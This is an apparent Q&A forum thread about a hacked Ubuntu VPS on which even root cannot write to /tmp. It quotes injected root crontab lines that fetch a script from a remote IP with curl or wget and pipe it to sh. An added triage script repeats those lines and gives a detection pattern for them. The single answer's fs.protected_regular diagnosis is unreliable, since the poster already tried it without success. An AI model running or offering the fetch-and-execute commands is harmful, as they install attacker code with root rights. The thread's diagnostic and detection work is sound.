Why can't even my root user write to the /tmp directory?

I cannot write anything to the /tmp directory.

Doing this as a non-root user:

europasprak@vps-xxxxxxxx:~$ echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted

europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' | sudo tee /tmp/dummy
tee: /tmp/dummy: Operation not permitted

And as the root user:

root@vps-xxxxxxxx:~# echo 'ok' > /tmp/dummy
bash: /tmp/dummy: Operation not permitted

It refuses even before asking for the sudo password:

Last login: Wed Aug 18 19:38:33 2021 from 91.168.98.130
europasprak@vps-3506b083:~$ sudo echo 'ok' > /tmp/dummy2
-bash: /tmp/dummy2: Operation not permitted

Interestingly, as root it also refuses to set the times in the following command:

root@vps-xxxxxxxx:/home/europasprak# touch /tmp/ok
touch: setting times of '/tmp/ok': No such file or directory

This problem appeared this morning.

The machine is:

europasprak@vps-xxxxxxxx:~$ uname -a
Linux vps-xxxxxxxx 5.8.0-63-generic #71-Ubuntu SMP Tue Jul 13 15:59:12 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Partitions:

europasprak@vps-xxxxxxxx:~$ df
Filesystem     1K-blocks     Used Available Use% Mounted on
tmpfs             795424     1072    794352   1% /run
/dev/sda1      162420480 59362024 103042072  37% /
tmpfs            3977116        0   3977116   0% /dev/shm
tmpfs               5120        0      5120   0% /run/lock
tmpfs               4096        0      4096   0% /sys/fs/cgroup
/dev/sda15        106858     8008     98851   8% /boot/efi
overlay        162420480 59362024 103042072  37% /home/europasprak/programs/install/docker/overlay2/2f1f82255bbd13b61ea151363e46880c4902b4b822fca15078fb9a10461111df/merged

europasprak@vps-xxxxxxxx:~$ df -i
Filesystem       Inodes  IUsed    IFree IUse% Mounted on
tmpfs            994279    640   993639    1% /run
/dev/sda1      20643840 523620 20120220    3% /
tmpfs            994279      4   994275    1% /dev/shm
tmpfs            994279      3   994276    1% /run/lock
tmpfs              1024     18     1006    2% /sys/fs/cgroup
/dev/sda15            0      0        0     - /boot/efi

More output:

europasprak@vps-xxxxxxxx:~$ ls -ld /tmp
drwxrwxrwt 12 root root 4096 août  18 05:45 /tmp

europasprak@vps-xxxxxxxx:~$ lsattr /tmp
--------------e----- /tmp/dump.rdb
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-timesyncd.service-11J2sh
lsattr: Permission denied While reading flags on /tmp/tmp.40xGrsPHCk
--------------e----- /tmp/exp_lin.so
--------------e----- /tmp/oi_plugins.php
--------------e----- /tmp/backup.db
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-logind.service-ffm01g
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-resolved.service-E7ECGg
--------------e----- /tmp/xm4.tgz
lsattr: Permission denied While reading flags on /tmp/snap.lxd

Update: I tried to install acl, but it obviously failed:

europasprak@vps-xxxxxxxx:~$ sudo apt install acl
Reading package lists... Error!
E: Unable to mkstemp /tmp/clearsigned.message.VjQNL9 - GetTempFile (1: Operation not permitted)
E: The package lists or status file could not be parsed or opened.
europasprak@vps-xxxxxxxx:~$ sudo apt update
Err:1 http://security.ubuntu.com/ubuntu groovy-security InRelease
  Temporary failure resolving 'security.ubuntu.com'
Err:2 https://download.docker.com/linux/ubuntu groovy InRelease
  Temporary failure resolving 'download.docker.com'
Err:3 http://ppa.launchpad.net/ultradvorka/ppa/ubuntu groovy InRelease
  Temporary failure resolving 'ppa.launchpad.net'
Err:4 http://nova.clouds.archive.ubuntu.com/ubuntu groovy InRelease
  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Err:5 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-updates InRelease
  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Err:6 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-backports InRelease
  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Reading package lists... Error!
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy/InRelease  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-updates/InRelease  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-backports/InRelease  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://security.ubuntu.com/ubuntu/dists/groovy-security/InRelease  Temporary failure resolving 'security.ubuntu.com'
W: Failed to fetch https://download.docker.com/linux/ubuntu/dists/groovy/InRelease  Temporary failure resolving 'download.docker.com'
W: Failed to fetch http://ppa.launchpad.net/ultradvorka/ppa/ubuntu/dists/groovy/InRelease  Temporary failure resolving 'ppa.launchpad.net'
W: Some index files failed to download. They have been ignored, or old ones used instead.
E: Unable to mkstemp /tmp/clearsigned.message.cOHaS4 - GetTempFile (1: Operation not permitted)
E: The package lists or status file could not be parsed or opened.

Update: I also tried turning off a setting, but it did not help:

europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted
europasprak@vps-xxxxxxxx:~$ sudo sysctl fs.protected_regular=0  
[sudo] password for europasprak: 
fs.protected_regular = 0
europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted

The VPS is a KVM instance:

europasprak@vps-xxxxxxxx:~$ sudo virt-what
kvm

Update:

europasprak@vps-xxxxxxxx:~$ sudo journalctl --boot --priority=4
[sudo] password for europasprak: 
-- Logs begin at Thu 2021-04-01 18:46:32 UTC, end at Sun 2021-08-22 13:54:48 UTC. --
août 20 20:52:46 vps-3506b083 kernel:  #2
août 20 20:52:46 vps-3506b083 kernel:  #3
août 20 20:52:46 vps-3506b083 kernel: acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge.
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: EISA: Cannot allocate resource for mainboard
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 1
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 2
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 3
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 4
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 5
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 6
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 7
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 8
août 20 20:52:46 vps-3506b083 kernel: sd 2:0:0:0: Power-on or device reset occurred
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/plymouth-start.service:17: Unit configured to use KillMode=none. This is unsafe, as it disables>
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/dbus.service:12: Unit configured to use KillMode=none. This is unsafe, as it disables systemd's>
août 20 20:52:46 vps-3506b083 systemd-udevd[413]: Could not set WakeOnLan of ens3 to off: Operation not supported
août 20 20:52:48 vps-3506b083 systemd-networkd[658]: /run/systemd/network/10-netplan-ens3.network: MTUBytes= in [Link] section and UseMTU= in [DHCP] section >
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/crontab
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/cron.d/zzh
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/cron.d/dog
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: testvxlan: Failed to get link config: No such device
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vx-001000-z6tjy: Failed to get link config: No such device
août 20 20:52:53 vps-3506b083 systemd-udevd[413]: vethe97279b: Could not generate persistent MAC: No data available
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vethe514997: Could not generate persistent MAC: No data available
août 20 20:52:53 vps-3506b083 systemd-networkd[658]: vethe97279b: Failed to wait for the interface to be initialized: No such device
europasprak@vps-3506b083:~$ 

Update: I found that my /etc/crontab file has been tampered with. My system has been hacked. Oddly, there does not seem to be any mining activity. I think I need to reinstall the system completely.

REDIS0006þ^@^@^Gbackup3Ã@Q@X^G


*/4 * ^A^_root curl -fsSL http://199.19.22^T6.117/b2f628fff19fda9À^@^K/b.sh | sh

^@^Gbackup1@F


*/2 * * * * root cd1 -fsSL http://199.19.226.117/b2f628/b.sh | sh

^@^Gbackup4Ã@Q@X^G


*/5 * ^A^_root wd1 -q -O- http://199.19.22^T6.117/b2f628fff19fda9À^@^K/b.sh | sh

^@^Gbackup2@H


*/3 * * * * root wget -q -O- http://199.19.226.117/b2f628/b.sh | sh

ÿWìðr<90><93>^Gæ
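An added triage script, written for this page and not taken from the question or the answer. It checks the one thing the question's `lsattr /tmp` does not show, the attributes of the /tmp directory itself: a directory carrying the immutable or append-only attribute refuses new entries even to root with "Operation not permitted" (EPERM), which is exactly the error shown above, whereas fs.protected_regular only restricts opening existing files in sticky directories and reports "Permission denied" (EACCES). It then scans cron files for the fetch-and-pipe-to-shell pattern found in the tampered /etc/crontab. Assumptions: POSIX sh with grep -E, awk, mktemp and wc; lsattr is optional. The sample crontab is constructed here from the two intact entries in the poster's dump plus benign and commented-out lines; it is not the poster's real file.

```shell
#!/bin/sh
# Added triage helper for this page; not code from the original question
# or answer.  Assumes POSIX sh with grep -E, awk, mktemp and wc; lsattr
# (e2fsprogs) is optional and only needed for the directory-attribute check.

# --- 1. Why would root get EPERM on /tmp? --------------------------------
# A directory with the immutable (i) or append-only (a) attribute refuses
# new entries even to root with "Operation not permitted".  `lsattr /tmp`
# lists the files inside; `lsattr -d /tmp` shows the directory's own flags.
dir_attr_flags() {
    # Print the attribute field of `lsattr -d` for a path, e.g.
    # "----i---------e-------"; fail if lsattr is missing or unsupported.
    command -v lsattr >/dev/null 2>&1 || return 1
    lsattr -d -- "$1" 2>/dev/null | awk '{print $1}'
}

flags_have_immutable() {
    # Exit 0 if an lsattr flag string contains the lowercase 'i' flag.
    # (Capital 'I', indexed directory, is unrelated and must not match.)
    case $1 in
        *i*) return 0 ;;
        *)   return 1 ;;
    esac
}

dir_is_immutable() {
    # Exit 0 if the directory is immutable, 1 if not, 2 if unreadable.
    flags=$(dir_attr_flags "$1") || return 2
    [ -n "$flags" ] || return 2
    flags_have_immutable "$flags"
}

# --- 2. Cron entries that pipe a download straight into a shell ----------
# Matches the shape of the entries in the tampered /etc/crontab above:
# "curl ... | sh" or "wget ... | sh" on a non-comment line.
scan_cron_pipe_to_shell() {
    # Usage: scan_cron_pipe_to_shell FILE...   Prints file:line:entry per hit.
    grep -HnE '^[^#]*(curl|wget)[^|]*[|][[:space:]]*(ba|da)?sh([[:space:]]|$)' "$@" 2>/dev/null
}

count_cron_pipe_to_shell() {
    # Same scan, printing only the number of matching lines.
    scan_cron_pipe_to_shell "$@" | wc -l | tr -d ' '
}

# --- 3. Constructed sample crontab: the two intact lines from the dump
#        above plus benign and commented-out entries (not the real file) ---
demo_crontab() {
    # Write the sample to a temp file and print its path.
    f=$(mktemp) || return 1
    cat >"$f" <<'EOF'
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/2 * * * * root curl -fsSL http://199.19.226.117/b2f628/b.sh | sh
*/3 * * * * root wget -q -O- http://199.19.226.117/b2f628/b.sh | sh
# */5 * * * * root wget -q -O- http://example.invalid/old.sh | sh
0 3 * * * root /usr/bin/curl -s https://example.invalid/health >/dev/null
EOF
    printf '%s\n' "$f"
}

# Stand-alone run: report /tmp's state, then scan the sample and the live
# cron files (the live paths simply produce no output where they don't exist).
if dir_is_immutable /tmp; then
    echo "/tmp has the immutable attribute: root cannot create files there"
fi
sample=$(demo_crontab)
scan_cron_pipe_to_shell "$sample" /etc/crontab /etc/cron.d/*
rm -f "$sample"
```

Run it as root on the affected host. If the immutable flag is reported, `chattr -i /tmp` removes it and explains the EPERM; but on a box whose /etc/crontab and /etc/cron.d files (the "bad minute" errors for /etc/cron.d/zzh and /etc/cron.d/dog in the journal above) have been rewritten by an attacker, the poster's conclusion of a full reinstall is the right one, and the scan is only there to confirm the scope before the host is wiped.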

Answer 1

This is the standard behaviour in Ubuntu 20.04+ because of the fs.protected_regular Linux kernel parameter. You can try disabling it like this:

sudo sysctl fs.protected_regular=0  

and see whether you can write to /tmp now.

If you want to make the fs.protected_regular=0 change permanent, add it to the /usr/lib/sysctl.d/protect-links.conf file.
